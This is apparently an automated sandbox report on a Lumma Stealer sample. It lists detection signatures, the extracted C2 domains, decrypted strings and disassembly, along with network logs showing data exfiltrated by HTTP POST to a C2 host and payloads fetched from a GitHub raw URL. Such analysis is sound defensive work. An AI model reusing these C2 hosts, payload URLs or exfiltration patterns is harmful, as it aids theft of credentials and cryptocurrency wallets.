Windows Analysis Report
BigProject.exe

Overview

General Information

Sample name: BigProject.exe
Analysis ID: 1579291
MD5: 98acefb3b4d697642895f954c5256a49
SHA1: 6db25168111275435e21e68773dc88d1cf86cfd9
SHA256: 36ae8fda3c54b17e1a0609c07aab00a27c435244e19990d45327e21b16455718
Tags: exeuser-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Adds / modifies Windows certificates
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Found malware configuration
Source: 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "energyaffai.lat", "necklacebudi.lat", "stem-mellows.cyou"], "Build id": "OPCN2M--Sergei"}
Multi AV Scanner detection for submitted file
Source: BigProject.exe Virustotal: Detection: 15% Perma Link
Source: BigProject.exe ReversingLabs: Detection: 15%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: stem-mellows.cyou
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000007.00000002.2450511619.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: OPCN2M--Sergei
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00415799 CryptUnprotectData, 7_2_00415799
Uses 32bit PE files
Source: BigProject.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: BigProject.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh] 7_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [esi], al 7_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 7_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, eax 7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ebp+00h], ax 7_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h] 7_2_0043C767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then lea edx, dword ptr [ecx+01h] 7_2_0040B70C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov esi, eax 7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, eax 7_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp eax 7_2_0042984F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov edx, ecx 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then test eax, eax 7_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], al 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h] 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h] 7_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ecx], bp 7_2_0041D83A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push C0BFD6CCh 7_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push C0BFD6CCh 7_2_00423086
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then add ebp, dword ptr [esp+0Ch] 7_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [esp+00000080h] 7_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h 7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ecx], dx 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebp, eax 7_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, esi 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ebx], cx 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 7_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh] 7_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh] 7_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push esi 7_2_00427AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ebx], ax 7_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push ebx 7_2_0043CA93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [esi], cx 7_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [eax], cx 7_2_00428B61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], cl 7_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edx, byte ptr [esp+eax] 7_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, eax 7_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 7_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h 7_2_0041D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp al, 2Eh 7_2_00426B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 7_2_00435450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh] 7_2_00417380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then push 00000000h 7_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [ecx], dx 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, dword ptr [ebp-20h] 7_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] 7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] 7_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h 7_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp eax 7_2_004385E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h] 7_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp dword ptr [0044450Ch] 7_2_00418591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [ebp-68h] 7_2_00428D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then xor edi, edi 7_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [0044473Ch] 7_2_0041C653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov edx, ebp 7_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp dword ptr [004455F4h] 7_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, eax 7_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then xor byte ptr [esp+eax+17h], al 7_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [edi], bl 7_2_00408F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 7_2_0042A700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov byte ptr [esi], al 7_2_0041BF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h] 7_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h] 7_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx eax, word ptr [edx] 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [edi], dx 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov word ptr [esi], cx 7_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then mov ecx, ebx 7_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then jmp ecx 7_2_0040BFFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h] 7_2_0043EFB0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:64951 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49741 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:58190 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49731 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49762 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 172.67.197.170:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: stem-mellows.cyou
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View IP Address: 185.199.110.133 185.199.110.133
Source: Joe Sandbox View IP Address: 172.67.197.170 172.67.197.170
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49741 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49750 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49756 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49773 -> 172.67.197.170:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49762 -> 172.67.197.170:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JJCHZ09245IHFZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BTXLCIL19R05PAIVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15066Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JBUIQ349LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20514Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QI8UC3UJNMKBVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1258Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WLEMZG0BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 422841Host: discokeyus.lat
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: discokeyus.lat
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf HTTP/1.1User-Agent: csHost: raw.githubusercontent.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: stem-mellows.cyou
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: x1.i.lencr.org
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.3.dr String found in binary or memory: http://x1.i.lencr.org/
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: CasPol.exe, 00000007.00000002.2452004141.0000000003440000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.999
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2450746382.0000000000D28000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/api
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/apis
Source: CasPol.exe, 00000007.00000002.2452106893.0000000003442000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/cYU5
Source: CasPol.exe, 00000007.00000002.2451042718.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discokeyus.lat/v
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001183000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/
Source: BigProject.exe, 00000000.00000002.2453321140.0000000001130000.00000004.00000020.00020000.00000000.sdmp, BigProject.exe, 00000000.00000002.2453321140.000000000113E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion
